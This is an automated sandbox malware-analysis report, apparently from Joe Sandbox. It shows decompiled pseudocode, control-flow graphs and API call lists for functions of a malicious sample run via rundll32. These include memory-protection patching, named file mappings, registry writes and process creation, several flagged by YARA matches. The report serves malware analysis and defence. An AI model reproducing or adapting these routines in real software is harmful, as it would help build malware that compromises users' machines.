                                control_flow_graph 285 343661d-343664f memset CreateWaitableTimerA 286 34367d0-34367d6 GetLastError 285->286 287 3436655-34366ae _allmul SetWaitableTimer WaitForMultipleObjects 285->287 288 34367da-34367e4 286->288 289 34366b4-34366b7 287->289 290 3436738-343673e 287->290 291 34366c2 289->291 292 34366b9 call 343216c 289->292 293 343673f-3436743 290->293 294 34366cc 291->294 298 34366be-34366c0 292->298 296 3436753-3436757 293->296 297 3436745-343674d RtlFreeHeap 293->297 300 34366d0-34366d5 294->300 296->293 299 3436759-3436763 CloseHandle 296->299 297->296 298->291 298->294 299->288 301 34366d7-34366de 300->301 302 34366e8-3436715 call 34343eb 300->302 301->302 303 34366e0 301->303 306 3436717-3436722 302->306 307 3436765-343676a 302->307 303->302 306->300 310 3436724-343672f call 34370d8 306->310 308 3436789-3436791 307->308 309 343676c-3436772 307->309 312 3436797-34367c5 _allmul SetWaitableTimer WaitForMultipleObjects 308->312 309->290 311 3436774-3436787 call 343561e 309->311 316 3436734 310->316 311->312 312->300 315 34367cb 312->315 315->290 316->290
                                C-Code - Quality: 83%
                                			E0343661D(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				intOrPtr _t68;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x343a2e0);
					_v76 = 0;
					_v80 = 0;
					L0343824A();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x343a30c; // 0x2cc
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x343a2ec = 5;
						} else {
							_t69 = E0343216C(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x343a300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E034343EB( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_t68 = E034370D8(_t75,  &_v72, _a4, _a8); // executed
							_v124.HighPart = _t68;
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x343a2e4);
							goto L21;
						} else {
							__eflags =  *0x343a2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E0343561E();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x343a2e8);
								L21:
								L0343824A();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t65;
								__eflags = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							RtlFreeHeap( *0x343a2d8, 0, _t54); // executed
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

































                                0x0343661d
                                0x03436633
                                0x03436637
                                0x0343663c
                                0x03436643
                                0x03436649
                                0x0343664f
                                0x034367d6
                                0x03436655
                                0x03436655
                                0x03436657
                                0x0343665c
                                0x0343665d
                                0x03436663
                                0x03436667
                                0x0343666b
                                0x03436679
                                0x03436687
                                0x0343668b
                                0x0343668d
                                0x0343669a
                                0x034366a6
                                0x034366a8
                                0x034366ae
                                0x034366b7
                                0x034366c2
                                0x034366c2
                                0x034366b9
                                0x034366b9
                                0x034366c0
                                0x00000000
                                0x00000000
                                0x034366c0
                                0x034366cc
                                0x00000000
                                0x034366d0
                                0x034366d5
                                0x034366e0
                                0x034366e0
                                0x034366e8
                                0x034366ee
                                0x034366f6
                                0x034366ff
                                0x03436706
                                0x0343670a
                                0x0343670f
                                0x03436715
                                0x00000000
                                0x00000000
                                0x03436717
                                0x0343671b
                                0x03436722
                                0x00000000
                                0x03436724
                                0x0343672f
                                0x03436734
                                0x03436734
                                0x00000000
                                0x03436765
                                0x03436765
                                0x0343676a
                                0x03436789
                                0x0343678b
                                0x03436790
                                0x03436791
                                0x00000000
                                0x0343676c
                                0x0343676c
                                0x03436772
                                0x00000000
                                0x03436774
                                0x03436774
                                0x03436779
                                0x0343677b
                                0x03436780
                                0x03436781
                                0x03436797
                                0x03436797
                                0x0343679f
                                0x034367ad
                                0x034367b1
                                0x034367bd
                                0x034367bf
                                0x034367c3
                                0x034367c5
                                0x00000000
                                0x034367cb
                                0x00000000
                                0x034367cb
                                0x034367c5
                                0x03436772
                                0x00000000
                                0x0343676a
                                0x03436738
                                0x0343673a
                                0x0343673e
                                0x0343673f
                                0x0343673f
                                0x03436743
                                0x0343674d
                                0x0343674d
                                0x03436753
                                0x03436756
                                0x03436756
                                0x0343675d
                                0x0343675d
                                0x034367e4
                                0x00000000

                                APIs
                                • memset.NTDLL ref: 03436637
                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 03436643
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 0343666B
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 0343668B
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,03433EE8,?), ref: 034366A6
                                • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,03433EE8,?,00000000), ref: 0343674D
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,03433EE8,?,00000000,?,?), ref: 0343675D
                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 03436797
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 034367B1
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 034367BD
                                  • Part of subcall function 0343216C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,055E9400,00000000,?,76CDF710,00000000,76CDF730), ref: 034321BB
                                  • Part of subcall function 0343216C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,055E9438,?,00000000,30314549,00000014,004F0053,055E93F4), ref: 03432258
                                  • Part of subcall function 0343216C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,034366BE), ref: 0343226A
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,03433EE8,?,00000000,?,?), ref: 034367D0
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                • String ID:
                                • API String ID: 3521023985-0
                                • Opcode ID: 214b51eb040632bf8af6263c5b9f99752194ae7b112f765c72ef7983e0579d43
                                • Instruction ID: 3ca6448b37db70735544ff2657a8315009fa9721e918c09e81df31098215195a
                                • Opcode Fuzzy Hash: 214b51eb040632bf8af6263c5b9f99752194ae7b112f765c72ef7983e0579d43
                                • Instruction Fuzzy Hash: E9515C71009321BFD710EF159C849AFBBE8EB8A360F544A1EF8A59B290D7748544CF96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03471A0A Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 318 3471a0a-3471a2b call 3493d64 321 3471a31-3471a32 318->321 322 3471b0d 318->322 323 3471a34-3471a37 321->323 324 3471a98-3471a9f 321->324 325 3471b13-3471b22 VirtualProtect 322->325 328 3471b64-3471b70 call 3493d9f 323->328 329 3471a3d 323->329 326 3471aa1-3471aa8 324->326 327 3471ae0-3471af5 VirtualProtect 324->327 330 3471b24-3471b3a VirtualProtect 325->330 331 3471b3f-3471b45 GetLastError 325->331 326->327 333 3471aaa-3471ab6 326->333 327->325 335 3471af7-3471b0b 327->335 332 3471a43-3471a4a 329->332 330->332 331->328 336 3471a8c-3471a93 332->336 337 3471a4c-3471a50 332->337 333->325 338 3471ab8-3471ac5 VirtualProtect 333->338 340 3471adc-3471ade VirtualProtect 335->340 336->328 337->336 341 3471a52-3471a6e lstrlen VirtualProtect 337->341 338->325 342 3471ac7-3471adb 338->342 340->325 341->336 343 3471a70-3471a8a lstrcpy VirtualProtect 341->343 342->340 343->336
                                APIs
                                • lstrlen.KERNEL32(?,?,00000000,?,034919C5,034994D8,?,?,00000004,00000000,?,00000000,03490977,0348893A,?,?), ref: 03471A58
                                • VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,034919C5,034994D8,?,?,00000004,00000000,?,00000000,03490977), ref: 03471A6A
                                • lstrcpy.KERNEL32(00000000,?), ref: 03471A79
                                • VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,034919C5,034994D8,?,?,00000004,00000000,?,00000000,03490977), ref: 03471A8A
                                • VirtualProtect.KERNEL32(00000001,00000005,00000040,-0000001C,03496040,00000018,034734DB,?,00000000,?,034919C5,034994D8,?,?,00000004,00000000), ref: 03471AC1
                                • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,?,034919C5,034994D8,?,?,00000004,00000000,?,00000000,03490977), ref: 03471ADC
                                • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,03496040,00000018,034734DB,?,00000000,?,034919C5,034994D8,?,?,00000004,00000000), ref: 03471AF1
                                • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,03496040,00000018,034734DB,?,00000000,?,034919C5,034994D8,?,?,00000004,00000000), ref: 03471B1E
                                • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,?,034919C5,034994D8,?,?,00000004,00000000,?,00000000,03490977), ref: 03471B38
                                • GetLastError.KERNEL32(?,00000000,?,034919C5,034994D8,?,?,00000004,00000000,?,00000000,03490977,0348893A,?,?), ref: 03471B3F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                                • String ID:
                                • API String ID: 3676034644-0
                                • Opcode ID: 1b964575f0f7eb87c0d0ded52e52f2d978680153d43ee27bf6d505c65257efe9
                                • Instruction ID: 94ebbded3451a1724679acf5465884d73114ed8ea6bef2ac82e8cddf792689d3
                                • Opcode Fuzzy Hash: 1b964575f0f7eb87c0d0ded52e52f2d978680153d43ee27bf6d505c65257efe9
                                • Instruction Fuzzy Hash: 54414D719007099FDB21DFA4CC45EABB7F4FB08350F05861AE652AA6A4E734E805CF68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034376BB Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 74%
                                			E034376BB(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L03438244();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x343a348; // 0x21ad5a8
				_t5 = _t13 + 0x343b87a; // 0x55e8e22
				_t6 = _t13 + 0x343b594; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L03437EAA();
				_t17 = CreateFileMappingW(0xffffffff, 0x343a34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                0x034376bb
                                0x034376c3
                                0x034376c7
                                0x034376cd
                                0x034376d2
                                0x034376d7
                                0x034376da
                                0x034376dd
                                0x034376e2
                                0x034376e3
                                0x034376e6
                                0x034376eb
                                0x034376f2
                                0x034376fc
                                0x034376fe
                                0x034376ff
                                0x03437702
                                0x0343771e
                                0x03437724
                                0x03437728
                                0x03437776
                                0x0343772a
                                0x03437737
                                0x03437747
                                0x0343774f
                                0x03437761
                                0x03437765
                                0x00000000
                                0x00000000
                                0x03437751
                                0x03437754
                                0x03437759
                                0x0343775b
                                0x0343775b
                                0x03437739
                                0x0343773b
                                0x03437767
                                0x03437768
                                0x03437768
                                0x03437737
                                0x0343777d

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,03433DBA,?,?,4D283A53,?,?), ref: 034376C7
                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 034376DD
                                • _snwprintf.NTDLL ref: 03437702
                                • CreateFileMappingW.KERNELBASE(000000FF,0343A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 0343771E
                                • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,03433DBA,?,?,4D283A53,?), ref: 03437730
                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 03437747
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,03433DBA,?,?,4D283A53), ref: 03437768
                                • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,03433DBA,?,?,4D283A53,?), ref: 03437770
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID:
                                • API String ID: 1814172918-0
                                • Opcode ID: f632bd8372a2176a6a4d163c6748225d87b50ebacd124260b9f41ff87d152ea1
                                • Instruction ID: 93093d4fa1c11427b8568bba384829d66fa7ce44977ce75a2ffe94214d08dfd9
                                • Opcode Fuzzy Hash: f632bd8372a2176a6a4d163c6748225d87b50ebacd124260b9f41ff87d152ea1
                                • Instruction Fuzzy Hash: B7210FB2640204BBD310EB68CC45FDE7BF9AB89710F240026FA59FF280D7B0A905CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03434274 Relevance: 12.1, APIs: 8, Instructions: 75networkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 93%
                                			E03434274(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E03436E40(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					FindCloseChangeNotification(_t20); // executed
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E03436C2C(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E03436C2C(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E03436C2C(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E03436C2C(_t46);
				}
				return _t24;
			}












                                0x03434274
                                0x03434274
                                0x03434276
                                0x03434278
                                0x0343427f
                                0x03434286
                                0x03434286
                                0x0343428b
                                0x0343428e
                                0x03434295
                                0x0343429e
                                0x034342a2
                                0x034342a7
                                0x034342a7
                                0x034342a9
                                0x034342ae
                                0x034342b2
                                0x034342b7
                                0x034342b7
                                0x034342b9
                                0x034342be
                                0x034342c2
                                0x034342c7
                                0x034342c7
                                0x034342c9
                                0x034342d4
                                0x034342d7
                                0x034342d7
                                0x034342d9
                                0x034342de
                                0x034342e1
                                0x034342e1
                                0x034342e3
                                0x034342ea
                                0x034342ed
                                0x034342f2
                                0x034342f5
                                0x034342f5
                                0x034342f8
                                0x034342fd
                                0x03434300
                                0x03434300
                                0x03434305
                                0x03434309
                                0x0343430c
                                0x0343430c
                                0x03434311
                                0x03434316
                                0x00000000
                                0x03434319
                                0x03434320

                                APIs
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 034342A2
                                • InternetCloseHandle.WININET(?), ref: 034342A7
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 034342B2
                                • InternetCloseHandle.WININET(?), ref: 034342B7
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 034342C2
                                • InternetCloseHandle.WININET(?), ref: 034342C7
                                • FindCloseChangeNotification.KERNEL32(?,00000000,00000102,?,?,03433801,?,?,76CC81D0,00000000,00000000), ref: 034342D7
                                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,03433801,?,?,76CC81D0,00000000,00000000), ref: 034342E1
                                  • Part of subcall function 03436E40: WaitForMultipleObjects.KERNEL32(00000002,03437BB5,00000000,03437BB5,?,?,?,03437BB5,0000EA60), ref: 03436E5B
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Internet$Close$Handle$CallbackStatus$ChangeFindMultipleNotificationObjectsWait
                                • String ID:
                                • API String ID: 2172891992-0
                                • Opcode ID: 921256547c1620f10c442890ec879df01b12ed29209c4796b95729fec373b1d8
                                • Instruction ID: bc6133a9a877cfe89cc39f8aa60598ded7dfc84554115a3d8cbb7581eada2b6e
                                • Opcode Fuzzy Hash: 921256547c1620f10c442890ec879df01b12ed29209c4796b95729fec373b1d8
                                • Instruction Fuzzy Hash: 5411CC7A6007486BC530EEABECC4C9BF7EDAB4A25035A0D1EE455EB750C725F8448A68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03483959 Relevance: 10.7, APIs: 7, Instructions: 185registrysynchronizationprocessCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 401 3483959-3483991 call 348bad1 404 3483993 401->404 405 34839f5-3483a0a WaitForSingleObject 401->405 408 3483996-34839ab call 348a651 404->408 406 3483a10-3483a1e 405->406 407 3483af4-3483b2d RtlExitUserThread 405->407 411 3483ab0-3483ac3 call 3483829 406->411 412 3483a24-3483a45 RegOpenKeyA 406->412 409 3483b2f-3483b3b 407->409 410 3483b40-3483b67 CreateProcessA 407->410 425 34839dc-34839f3 call 348e803 408->425 426 34839ad-34839c4 408->426 409->410 431 3483b3d 409->431 416 3483b69-3483b6f call 3485d7a 410->416 417 3483b74-3483b76 410->417 411->407 429 3483ac5-3483ad4 WaitForSingleObject 411->429 414 3483a6f-3483a72 412->414 415 3483a47-3483a69 RegSetValueExA RegCloseKey 412->415 422 3483a79-3483aad call 348e778 414->422 423 3483a74-3483a77 414->423 415->414 416->417 427 3483b78-3483b79 call 348e803 417->427 428 3483b7e-3483b8c 417->428 422->411 423->411 423->422 425->405 425->408 426->425 438 34839c6-34839d7 call 347f39b 426->438 427->428 429->407 434 3483ad6-3483af1 call 348d30a 429->434 431->410 434->407 438->425
                                APIs
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0348BB1D
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0348BB29
                                  • Part of subcall function 0348BAD1: memset.NTDLL ref: 0348BB71
                                  • Part of subcall function 0348BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0348BB8C
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(0000002C), ref: 0348BBC4
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?), ref: 0348BBCC
                                  • Part of subcall function 0348BAD1: memset.NTDLL ref: 0348BBEF
                                  • Part of subcall function 0348BAD1: wcscpy.NTDLL ref: 0348BC01
                                • WaitForSingleObject.KERNEL32(00000000,?,06169998,?,00000000,00000000,00000001), ref: 03483A03
                                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 03483A3D
                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 03483A60
                                • RegCloseKey.ADVAPI32(?), ref: 03483A69
                                • WaitForSingleObject.KERNEL32(00000000), ref: 03483ACD
                                • RtlExitUserThread.NTDLL(?), ref: 03483B03
                                  • Part of subcall function 0348A651: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,76C86920,00000000,?,?,?,0347148A,?,?,?), ref: 0348A66F
                                  • Part of subcall function 0348A651: GetFileSize.KERNEL32(00000000,00000000,?,?,0347148A,?,?,?), ref: 0348A67F
                                  • Part of subcall function 0348A651: CloseHandle.KERNEL32(000000FF,?,?,0347148A,?,?,?), ref: 0348A6E1
                                • CreateProcessA.KERNEL32(?,?,?,76CDF750,?,?,?,?,?,?,?,?,76CDF750), ref: 03483B5C
                                  • Part of subcall function 0347F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0347F3DB
                                  • Part of subcall function 0347F39B: GetLastError.KERNEL32 ref: 0347F3E5
                                  • Part of subcall function 0347F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0347F40A
                                  • Part of subcall function 0347F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0347F42D
                                  • Part of subcall function 0347F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0347F455
                                  • Part of subcall function 0347F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0347F46A
                                  • Part of subcall function 0347F39B: SetEndOfFile.KERNEL32(00001000), ref: 0347F477
                                  • Part of subcall function 0347F39B: CloseHandle.KERNEL32(00001000), ref: 0347F48F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Createlstrlen$CloseObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerProcessSizeThreadUserValueWritewcscpy
                                • String ID:
                                • API String ID: 3876914104-0
                                • Opcode ID: df71004c4980f6ba5e679b05b772d391517f6d0c3b83ad6800a92d1859430ef0
                                • Instruction ID: 52dc85a55266deb673398b30c8b6b26cf34c749c2c6a5a52fa4018dfef5e578b
                                • Opcode Fuzzy Hash: df71004c4980f6ba5e679b05b772d391517f6d0c3b83ad6800a92d1859430ef0
                                • Instruction Fuzzy Hash: FD614C79A00209AFDF11EF99D885E9EBBF9EB08710F04416BF918EF251D7709911CB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03478C35 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 442 3478c35-3478c63 call 3493d64 call 34866d7 447 3478c69-3478c7a call 34733a5 442->447 448 3478d98-3478d9f 442->448 454 3478d90-3478d96 GetLastError 447->454 455 3478c80-3478ca9 call 347a253 447->455 450 3478db5 448->450 451 3478db8-3478dc4 call 3493d9f 448->451 450->451 454->450 455->451 459 3478caf-3478cb6 455->459 460 3478d13-3478d3c VirtualProtect 459->460 461 3478cb8-3478cbf 459->461 462 3478d47-3478d81 RtlEnterCriticalSection RtlLeaveCriticalSection call 34774ae 460->462 463 3478d3e-3478d42 call 347bdee 460->463 461->460 464 3478cc1-3478cd0 call 347ea5e 461->464 468 3478d86-3478d88 462->468 463->462 464->460 471 3478cd2-3478ce0 call 34733a5 464->471 468->451 470 3478d8a-3478d8e 468->470 470->451 471->460 474 3478ce2-3478cfa 471->474 475 3478d03-3478d0d VirtualProtect 474->475 476 3478cfc 474->476 475->460 476->475
                                APIs
                                  • Part of subcall function 034733A5: VirtualProtect.KERNEL32(?,?,00000040,?,?,?,00000000), ref: 034733CA
                                  • Part of subcall function 034733A5: GetLastError.KERNEL32(?,00000000), ref: 034733D2
                                  • Part of subcall function 034733A5: VirtualQuery.KERNEL32(?,?,0000001C,?,00000000), ref: 034733E9
                                  • Part of subcall function 034733A5: VirtualProtect.KERNEL32(?,?,-2C9B417C,?,?,00000000), ref: 0347340E
                                • GetLastError.KERNEL32(00000000,00000004,?,?,80000000,00000000,00000001,034960B0,0000001C,0348BE61,00000002,?,00000001,80000000,03499A20,80000000), ref: 03478D90
                                  • Part of subcall function 0347A253: lstrlen.KERNEL32(?,?), ref: 0347A28B
                                  • Part of subcall function 0347A253: lstrcpy.KERNEL32(00000000,?), ref: 0347A2A2
                                  • Part of subcall function 0347A253: StrChrA.SHLWAPI(00000000,0000002E), ref: 0347A2AB
                                  • Part of subcall function 0347A253: GetModuleHandleA.KERNEL32(00000000), ref: 0347A2C9
                                • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,80000000), ref: 03478D0D
                                • VirtualProtect.KERNEL32(?,00000004,?,?,?,?,00000000,00000004,?,?,80000000,00000000,00000001,034960B0,0000001C,0348BE61), ref: 03478D28
